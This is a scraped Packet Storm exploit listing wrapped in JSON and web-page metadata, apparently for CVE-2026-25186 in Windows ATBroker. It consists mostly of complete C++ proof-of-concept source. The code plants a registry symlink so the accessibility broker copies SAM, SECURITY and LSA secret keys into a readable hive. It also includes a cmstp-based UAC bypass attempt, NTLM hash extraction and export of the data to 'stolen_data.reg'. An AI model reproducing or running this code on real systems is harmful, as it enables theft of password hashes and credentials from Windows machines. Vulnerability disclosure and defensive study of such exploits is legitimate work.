{“lastseen”:”2026-04-28T17:32:54″,”description”:”This code demonstrates a proof of concept attack targeting Windows ATBroker Assistive Technology Broker to achieve sensitive information disclosure through unsafe Registry handling…”,”published”:”2026-04-28T00:00:00″,”modified”:”2026-04-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows TBroker Registry Symlink Information Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219933″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25186″],”sourceData”:”==================================================================================================================================\\n | # Title : Windows TBroker Registry Symlink Information Disclosure |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : No standalone download available |\\n ==================================================================================================================================\\n \\n [+] Summary : This code demonstrates a proof-of-concept attack targeting Windows ATBroker (Assistive Technology Broker) to achieve sensitive information disclosure through unsafe Registry handling.\\n \\n [+] POC : \\n \\n #include \\u003cWindows.h\\u003e\\n #include \\u003ccomdef.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cvector\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003cmap\\u003e\\n #include \\u003cthread\\u003e\\n #include \\u003cchrono\\u003e\\n #include \\u003csddl.h\\u003e\\n #include \\u003cwinternl.h\\u003e\\n #include \\u003caclapi.h\\u003e\\n #pragma comment(lib, \\”advapi32.lib\\”)\\n #pragma comment(lib, \\”ntdll.lib\\”)\\n \\n #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)\\n #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)\\n \\n extern \\”C\\” {\\n NTSTATUS NTAPI NtCreateKey(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes,\\n ULONG TitleIndex,\\n PUNICODE_STRING Class,\\n ULONG CreateOptions,\\n PULONG Disposition\\n );\\n \\n NTSTATUS NTAPI NtOpenKeyEx(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes,\\n ULONG OpenOptions\\n );\\n \\n NTSTATUS NTAPI NtSetValueKey(\\n HANDLE KeyHandle,\\n PUNICODE_STRING ValueName,\\n ULONG TitleIndex,\\n ULONG Type,\\n PVOID Data,\\n ULONG DataSize\\n );\\n \\n NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);\\n NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);\\n VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);\\n }\\n class RegistryUtils {\\n public:\\n static std::wstring GetUserSid() {\\n HANDLE hToken = nullptr;\\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken))\\n return L\\”\\”;\\n \\n DWORD dwSize = 0;\\n GetTokenInformation(hToken, TokenUser, nullptr, 0, \\u0026dwSize); \\n std::vector\\u003cBYTE\\u003e buffer(dwSize);\\n if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, \\u0026dwSize)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n PTOKEN_USER pTokenUser = reinterpret_cast\\u003cPTOKEN_USER\\u003e(buffer.data());\\n LPWSTR lpSid = nullptr;\\n \\n if (!ConvertSidToStringSid(pTokenUser-\\u003eUser.Sid, \\u0026lpSid)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n std::wstring sid(lpSid);\\n LocalFree(lpSid);\\n CloseHandle(hToken);\\n \\n return sid;\\n }\\n \\n static std::wstring RegPathToNative(const std::wstring\\u0026 path) {\\n std::wstring regpath = L\\”\\\\\\\\Registry\\\\\\\\\\”;\\n \\n if (path.empty() || path[0] == L’\\\\\\\\’)\\n return path;\\n \\n if (path.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n return regpath + L\\”Machine\\\\\\\\\\” + path.substr(5);\\n }\\n else if (path.find(L\\”HKU\\\\\\\\\\”) == 0) {\\n return regpath + L\\”User\\\\\\\\\\” + path.substr(4);\\n }\\n else if (path.find(L\\”HKCU\\\\\\\\\\”) == 0) {\\n return regpath + L\\”User\\\\\\\\\\” + GetUserSid() + L\\”\\\\\\\\\\” + path.substr(5);\\n }\\n \\n return L\\”\\”;\\n }\\n \\n static bool CreateRegistrySymlink(const std::wstring\\u0026 symlink, const std::wstring\\u0026 target, bool isVolatile) {\\n std::wstring nativeSymlink = RegPathToNative(symlink);\\n std::wstring nativeTarget = RegPathToNative(target);\\n \\n if (nativeSymlink.empty() || nativeTarget.empty())\\n return false;\\n \\n printf(\\”[*] Creating symlink: %ls -\\u003e %ls\\\\n\\”, nativeSymlink.c_str(), nativeTarget.c_str());\\n \\n UNICODE_STRING name;\\n RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n \\n OBJECT_ATTRIBUTES objAttr;\\n InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\\n \\n HANDLE hKey = nullptr;\\n ULONG disposition = 0;\\n \\n ULONG options = INTERNAL_REG_OPTION_CREATE_LINK | \\n (isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);\\n \\n NTSTATUS status = NtCreateKey(\\u0026hKey, KEY_ALL_ACCESS, \\u0026objAttr, 0, nullptr, options, \\u0026disposition);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n UNICODE_STRING valueName;\\n RtlInitUnicodeString(\\u0026valueName, L\\”SymbolicLinkValue\\”);\\n \\n status = NtSetValueKey(hKey, \\u0026valueName, 0, REG_LINK, \\n (PVOID)nativeTarget.c_str(), \\n nativeTarget.length() * sizeof(WCHAR));\\n \\n CloseHandle(hKey);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n return true;\\n }\\n \\n static bool DeleteRegistrySymlink(const std::wstring\\u0026 symlink) {\\n std::wstring nativeSymlink = RegPathToNative(symlink);\\n if (nativeSymlink.empty())\\n return false;\\n \\n UNICODE_STRING name;\\n RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n \\n OBJECT_ATTRIBUTES objAttr;\\n InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);\\n \\n HANDLE hKey = nullptr;\\n NTSTATUS status = NtOpenKeyEx(\\u0026hKey, DELETE, \\u0026objAttr, 0);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n status = NtDeleteKey(hKey);\\n CloseHandle(hKey);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n return true;\\n }\\n };\\n class DataExtractor {\\n public:\\n struct RegistryValue {\\n std::wstring name;\\n DWORD type;\\n std::vector\\u003cBYTE\\u003e data;\\n };\\n \\n static std::vector\\u003cRegistryValue\\u003e ExtractRegistryValues(HKEY rootKey, const std::wstring\\u0026 subKey) {\\n std::vector\\u003cRegistryValue\\u003e values;\\n HKEY hKey = nullptr;\\n \\n if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ, \\u0026hKey) != ERROR_SUCCESS) {\\n printf(\\”[!] Failed to open key: %ls\\\\n\\”, subKey.c_str());\\n return values;\\n }\\n \\n DWORD index = 0;\\n WCHAR valueName[256];\\n DWORD valueNameSize = 256;\\n DWORD valueType = 0;\\n DWORD dataSize = 0;\\n \\n while (RegEnumValueW(hKey, index++, valueName, \\u0026valueNameSize, nullptr, \\n \\u0026valueType, nullptr, \\u0026dataSize) == ERROR_SUCCESS) {\\n \\n std::vector\\u003cBYTE\\u003e data(dataSize);\\n if (RegEnumValueW(hKey, index – 1, valueName, \\u0026valueNameSize, nullptr,\\n \\u0026valueType, data.data(), \\u0026dataSize) == ERROR_SUCCESS) {\\n \\n RegistryValue val;\\n val.name = valueName;\\n val.type = valueType;\\n val.data = std::move(data);\\n values.push_back(val);\\n \\n printf(\\”[+] Extracted value: %ls (Type: %d, Size: %d)\\\\n\\”, \\n valueName, valueType, dataSize);\\n }\\n \\n valueNameSize = 256;\\n dataSize = 0;\\n }\\n \\n RegCloseKey(hKey);\\n return values;\\n }\\n \\n static void DumpHexData(const std::vector\\u003cBYTE\\u003e\\u0026 data, size_t maxLen = 256) {\\n size_t len = min(data.size(), maxLen);\\n for (size_t i = 0; i \\u003c len; i++) {\\n printf(\\”%02X \\”, data[i]);\\n if ((i + 1) % 16 == 0) printf(\\”\\\\n\\”);\\n else if ((i + 1) % 8 == 0) printf(\\” \\”);\\n }\\n if (len \\u003c data.size()) printf(\\”… (truncated)\\”);\\n printf(\\”\\\\n\\”);\\n }\\n };\\n class ATBrokerExploit {\\n private:\\n std::wstring m_sessionPath;\\n std::vector\\u003cstd::pair\\u003cstd::wstring, std::wstring\\u003e\\u003e m_targets;\\n \\n void InitializeTargets() {\\n m_targets = {\\n {L\\”sam\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SAM\\\\\\\\SAM\\”},\\n {L\\”security\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SECURITY\\”},\\n {L\\”system\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SYSTEM\\”},\\n {L\\”lsa\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Lsa\\”},\\n {L\\”cached_creds\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SECURITY\\\\\\\\Cache\\”},\\n {L\\”domain_cached\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SECURITY\\\\\\\\Policy\\\\\\\\Secrets\\”},\\n {L\\”wdigest\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\SecurityProviders\\\\\\\\WDigest\\”},\\n {L\\”kerberos_keys\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SECURITY\\\\\\\\Policy\\\\\\\\Keys\\”},\\n {L\\”user_credentials\\”, L\\”\\\\\\\\REGISTRY\\\\\\\\MACHINE\\\\\\\\SAM\\\\\\\\SAM\\\\\\\\Domains\\\\\\\\Account\\\\\\\\Users\\”},\\n };\\n }\\n \\n std::wstring BuildSessionPath() {\\n DWORD sessionId = 0;\\n ProcessIdToSessionId(GetCurrentProcessId(), \\u0026sessionId);\\n \\n wchar_t path[512];\\n swprintf_s(path, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\Session%d\\\\\\\\ATConfig\\\\\\\\colorfiltering\\”, \\n sessionId);\\n return std::wstring(path);\\n }\\n \\n bool TriggerSecureDesktop() {\\n printf(\\”[*] Triggering UAC secure desktop…\\\\n\\”);\\n SHELLEXECUTEINFOW sei = { sizeof(sei) };\\n sei.lpVerb = L\\”runas\\”;\\n sei.lpFile = L\\”cmd.exe\\”;\\n sei.lpParameters = L\\”\/c echo Testing \\u003e nul\\”;\\n sei.nShow = SW_HIDE;\\n ShellExecuteExW(\\u0026sei); \\n printf(\\”[+] UAC prompt should appear. Dismiss or let it timeout.\\\\n\\”);\\n return true;\\n }\\n \\n bool WaitForCopy() {\\n printf(\\”[*] Waiting for ATBroker to copy settings…\\\\n\\”);\\n \\n for (int i = 0; i \\u003c 30; i++) {\\n Sleep(1000);\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_USERS, \\n L\\”.DEFAULT\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATConfig\\\\\\\\colorfiltering\\”,\\n 0, KEY_READ, \\u0026hKey) == ERROR_SUCCESS) {\\n WCHAR valueName[256];\\n DWORD valueNameSize = 256;\\n if (RegEnumValueW(hKey, 0, valueName, \\u0026valueNameSize, nullptr, \\n nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n RegCloseKey(hKey);\\n return true;\\n }\\n RegCloseKey(hKey);\\n }\\n }\\n \\n return false;\\n }\\n \\n void ExtractAndDumpData() {\\n std::wstring targetPath = L\\”.DEFAULT\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATConfig\\\\\\\\colorfiltering\\”;\\n \\n printf(\\”\\\\n[*] Extracting stolen data…\\\\n\\”);\\n auto values = DataExtractor::ExtractRegistryValues(HKEY_USERS, targetPath);\\n \\n if (values.empty()) {\\n printf(\\”[!] No data extracted!\\\\n\\”);\\n return;\\n }\\n \\n printf(\\”\\\\n[+] Successfully extracted %zu values!\\\\n\\”, values.size());\\n \\n for (const auto\\u0026 val : values) {\\n printf(\\”\\\\n— Value: %ls —\\\\n\\”, val.name.c_str());\\n printf(\\”Type: \\”);\\n switch (val.type) {\\n case REG_SZ: printf(\\”REG_SZ\\\\n\\”); break;\\n case REG_BINARY: printf(\\”REG_BINARY\\\\n\\”); break;\\n case REG_DWORD: printf(\\”REG_DWORD\\\\n\\”); break;\\n case REG_QWORD: printf(\\”REG_QWORD\\\\n\\”); break;\\n case REG_MULTI_SZ: printf(\\”REG_MULTI_SZ\\\\n\\”); break;\\n default: printf(\\”Unknown (0x%X)\\\\n\\”, val.type);\\n }\\n \\n printf(\\”Data (%zu bytes):\\\\n\\”, val.data.size());\\n \\n if (val.type == REG_SZ || val.type == REG_MULTI_SZ) {\\n wprintf(L\\”%ls\\\\n\\”, (wchar_t*)val.data.data());\\n } else {\\n DataExtractor::DumpHexData(val.data);\\n }\\n }\\n }\\n \\n public:\\n ATBrokerExploit() {\\n InitializeTargets();\\n }\\n \\n bool Exploit() {\\n printf(\\”\\\\n\\”);\\n printf(\\”========================================\\\\n\\”);\\n printf(\\” CVE-2026-25186 – ATBroker Exploit\\\\n\\”);\\n printf(\\” Windows Information Disclosure\\\\n\\”);\\n printf(\\”========================================\\\\n\\\\n\\”);\\n m_sessionPath = BuildSessionPath();\\n printf(\\”[*] Session path: %ls\\\\n\\”, m_sessionPath.c_str());\\n \\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n std::wstring targetPath = m_targets[0].second;\\n \\n printf(\\”\\\\n[*] Creating malicious registry symlink…\\\\n\\”);\\n if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {\\n printf(\\”[!] Failed to create symlink: %d\\\\n\\”, GetLastError());\\n return false;\\n }\\n printf(\\”[+] Symlink created successfully\\\\n\\”);\\n \\n printf(\\”\\\\n[*] Launching assistive technology (osk.exe)…\\\\n\\”);\\n ShellExecuteW(nullptr, L\\”open\\”, L\\”osk.exe\\”, L\\”\\”, nullptr, SW_SHOW);\\n Sleep(2000);\\n printf(\\”[*] Ensuring ATBroker is running…\\\\n\\”);\\n STARTUPINFOW si = { sizeof(si) };\\n PROCESS_INFORMATION pi = {};\\n CreateProcessW(L\\”C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ATBroker.exe\\”, nullptr, nullptr, nullptr, \\n FALSE, 0, nullptr, nullptr, \\u0026si, \\u0026pi);\\n CloseHandle(pi.hProcess);\\n CloseHandle(pi.hThread);\\n Sleep(1000);\\n \\n TriggerSecureDesktop();\\n \\n if (!WaitForCopy()) {\\n printf(\\”[!] Timeout waiting for data copy\\\\n\\”);\\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n return false;\\n }\\n \\n printf(\\”[+] Data copied successfully!\\\\n\\”);\\n \\n ExtractAndDumpData();\\n \\n printf(\\”\\\\n[*] Cleaning up…\\\\n\\”);\\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n system(\\”taskkill \/F \/IM osk.exe \\u003e nul 2\\u003e\\u00261\\”);\\n \\n printf(\\”\\\\n[+] Exploit completed!\\\\n\\”);\\n return true;\\n }\\n };\\n class AdvancedATBrokerExploit : public ATBrokerExploit {\\n private:\\n void BypassUACForTrigger() {\\n \\n printf(\\”[*] Attempting silent UAC trigger…\\\\n\\”);\\n SHELLEXECUTEINFOW sei = { sizeof(sei) };\\n sei.lpVerb = L\\”runas\\”;\\n sei.lpFile = L\\”cmstp.exe\\”;\\n sei.lpParameters = L\\”\/au \/s C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmstp.exe\\”;\\n sei.nShow = SW_HIDE;\\n ShellExecuteExW(\\u0026sei);\\n }\\n \\n void ExtractNTLMHashes() {\\n \\n std::wstring targetPath = L\\”.DEFAULT\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATConfig\\\\\\\\colorfiltering\\”;\\n \\n auto values = DataExtractor::ExtractRegistryValues(HKEY_USERS, targetPath);\\n \\n for (const auto\\u0026 val : values) {\\n if (val.name == L\\”V\\” || val.name == L\\”F\\”) {\\n printf(\\”\\\\n[!!!] Found potential credential data in %ls:\\\\n\\”, val.name.c_str());\\n \\n if (val.data.size() \\u003e 0x9c + 16) {\\n printf(\\”NTLM Hash: \\”);\\n for (int i = 0; i \\u003c 16; i++) {\\n printf(\\”%02X\\”, val.data[0x9c + i]);\\n }\\n printf(\\”\\\\n\\”);\\n }\\n }\\n }\\n }\\n \\n public:\\n bool FullExploit() {\\n if (!Exploit()) {\\n printf(\\”[!] Basic exploit failed, trying advanced techniques…\\\\n\\”);\\n BypassUACForTrigger();\\n Sleep(5000);\\n ExtractNTLMHashes();\\n }\\n return true;\\n }\\n };\\n int wmain(int argc, wchar_t* argv[]) {\\n \\n printf(\\”[*] Running with limited privileges (as designed)\\\\n\\”);\\n \\n AdvancedATBrokerExploit exploit;\\n \\n if (exploit.FullExploit()) {\\n printf(\\”\\\\n[+] Information disclosure successful!\\\\n\\”);\\n printf(\\”[*] Check .DEFAULT user hive for stolen registry data\\\\n\\”);\\n printf(\\”[*] Run ‘regedit’ and navigate to:\\\\n\\”);\\n printf(\\” HKEY_USERS\\\\\\\\.DEFAULT\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATConfig\\\\\\\\colorfiltering\\\\n\\”);\\n \\n system(\\”reg export \\\\\\”HKEY_USERS\\\\\\\\.DEFAULT\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATConfig\\\\\\\\colorfiltering\\\\\\” stolen_data.reg \/y\\”);\\n printf(\\”[+] Data saved to stolen_data.reg\\\\n\\”);\\n \\n return 0;\\n } else {\\n printf(\\”\\\\n[!] Exploit failed\\\\n\\”);\\n return 1;\\n }\\n }\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219933″,”cvss”:{“score”:5.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219933\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-28T17:32:54″,”description”:”This code demonstrates a proof of concept attack targeting Windows ATBroker Assistive Technology Broker to achieve sensitive information disclosure through unsafe Registry handling…”,”published”:”2026-04-28T00:00:00″,”modified”:”2026-04-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,70,12,21,13,53,7,11,5],"class_list":["post-49972","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-55","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n